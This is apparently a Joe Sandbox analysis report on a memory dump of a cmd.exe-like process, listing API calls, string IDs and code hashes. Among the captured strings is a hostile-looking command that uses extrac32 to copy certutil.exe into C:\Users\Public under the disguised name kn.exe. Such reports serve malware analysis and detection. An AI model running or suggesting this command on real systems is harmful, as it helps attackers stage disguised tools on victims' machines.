                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: <noalias>$CMD.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1161012917-1690691951
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b58a463ac40260b77c1f77e4a7b5237eff66e5f9bf10d296fb4dbda1cd5a4aa8
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D918225B097528AFB14AB60EC241BFBAA1BF49B58FD88135DE0E477D5DF3C94498320
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: _get_osfhandle.MSVCRT ref: 00007FF706EC3584
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC359C
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC35C3
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC35D9
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC35ED
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC3602
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706EB32F3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF706EB32A4), ref: 00007FF706EB3309
                                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF706EB3384
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF706ED11DF
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 611521582-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: \\?\
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 628682198-4282027825
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$memset$ErrorFileHeapLast$AllocAttributesCloseFindMoveProcessProgressWith_setjmpiswspacelongjmpwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 16309207-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: GOTO$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3863671652-4137775220
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f803880b4beb2ad6873c314903c41a20bf742b864235e080ee83bf25c8da2de2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 861fd574786a2e4756fe876b0fe18680cfa6a53da05ebc2e1ab213a67e45e7a0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f803880b4beb2ad6873c314903c41a20bf742b864235e080ee83bf25c8da2de2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77E1BC21A0D34286FA64BB14AC743BBE6A0BF45B54FE45235DA0E072D1DF3CE8468320
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
Similarity
• API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
• String ID: $Application$System
• API String ID: 3538039442-1881496484
APIs
• longjmp.MSVCRT(?,?,00000000,00007FF706ED048E), ref: 00007FF706EDDA58
• memset.MSVCRT ref: 00007FF706EDDAD6
• memset.MSVCRT ref: 00007FF706EDDAFC
• memset.MSVCRT ref: 00007FF706EDDB22
  • Part of subcall function 00007FF706EC3A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF706EDEAC5,?,?,?,00007FF706EDE925,?,?,?,?,00007FF706EBB9B1), ref: 00007FF706EC3A56
  • Part of subcall function 00007FF706EB5194: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF706EB51C4
  • Part of subcall function 00007FF706EC823C: FindFirstFileExW.KERNELBASE ref: 00007FF706EC8280
  • Part of subcall function 00007FF706EC823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF706EC829D
  • Part of subcall function 00007FF706EC01B8: _get_osfhandle.MSVCRT ref: 00007FF706EC01C4
  • Part of subcall function 00007FF706EC01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF706ECE904,?,?,?,?,00000000,00007FF706EC3491,?,?,?,00007FF706ED4420), ref: 00007FF706EC01D6
  • Part of subcall function 00007FF706EB4FE8: _get_osfhandle.MSVCRT ref: 00007FF706EB5012
  • Part of subcall function 00007FF706EB4FE8: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EB5030
• GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EDDDB0
  • Part of subcall function 00007FF706EB59E4: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EB5A2E
  • Part of subcall function 00007FF706EB59E4: _open_osfhandle.MSVCRT ref: 00007FF706EB5A4F
• _get_osfhandle.MSVCRT ref: 00007FF706EDDDEB
• SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EDDDFA
• ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF706EDE204
• ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF706EDE223
• ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF706EDE242
Strings
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
Similarity
• API ID: File$_get_osfhandlememset$Find$AllocAttributesCloseCreateErrorFirstLastReadTypeVirtual_open_osfhandlelongjmp
• String ID: %9d$%s$~
• API String ID: 3651208239-912394897
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: COPYCMD$\
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3989487059-1802776761
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5bff41a680e467b1b33a0b7bb16375dc4a11cdb88bd4a8787dadcd2c99fb79b7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5b937e1f8b9b406542b2eaaecd17132087e1067d9823345af16ee3ae62f70ea2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5bff41a680e467b1b33a0b7bb16375dc4a11cdb88bd4a8787dadcd2c99fb79b7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28F1D326B0878682EA20BB15DC652BBE3A0FF45B88F949135CE4E477A5EF3CE445C310
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Time$File$System$FormatInfoLocalLocale
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$HH:mm:ss t
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 55602301-2548490036
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: fbcd703ebd8b9031eaeb8506e8c6f4581c2cd31246848d5e683a77ab20023de4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0BA16D36A1874296EB20AB14EC602BBB7A5FF84764FD04136DA5E03694EF3CE546C760
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3935429995-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6fb21c5007d68856894713246c8659905f2345a8b78e3383b22c75447c2fd86c
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1361912AA1875286E714EF25EC245BAFBA4FF89F98F858135DE4A43790DF3CD4818710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _get_osfhandlememset$wcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: DPATH
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3260997497-2010427443
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: @P
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1801357106-3670739982
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$BufferConsoleInfoScreen
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1034426908-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 64486a4b6b13c1c8e977e62f0f94e25a0603b25ea896dd7b7fc126d69d5cd52d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c41fc352ef571df71f98268f3a65bca59e9b7dc09e2470cefabfbc33bfee4950
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64486a4b6b13c1c8e977e62f0f94e25a0603b25ea896dd7b7fc126d69d5cd52d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C3F18132A087828AEB64EF259C602FBA7A4FF45748F845235DB4E4B695DF38E605C710
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseValue$CreateDeleteOpen
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %s=%s$\Shell\Open\Command
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4081037667-3301834661
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d7ebf19dc54841a91d8a5d624eaac156eade648abef84b2db18b980c6032974d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D71A322B0974286EB20AB59EC602BBE2A1FF85794FC84531DF4E07794DF3CE6418720
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF706EDAA85
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF706EDAACF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF706EDAAEC
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF706ED98C0), ref: 00007FF706EDAB39
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF706ED98C0), ref: 00007FF706EDAB6F
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF706ED98C0), ref: 00007FF706EDABA4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF706ED98C0), ref: 00007FF706EDABCB
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseDeleteValue$CreateOpen
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %s=%s
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1019019434-1087296587
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5ceb17f866f4daba16a50a38e2b2683f520bcde2eb45c1f69a3fa242514898d1
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6519231B08B4686E760AB69EC6477BB6A1FF89790F849234CB4D83794DF3DD5428710
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsnicmpwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: COPYCMD
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2429825313-3727491224
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f7690b631fe4a497929ad1ff36404649eca3189cd9b36e3ecc69e06a31ca435d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0CF19E22E087428AFB60AF519C706BFB2A1BF147A8F985235CE5D236D4DF3CA545C760
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
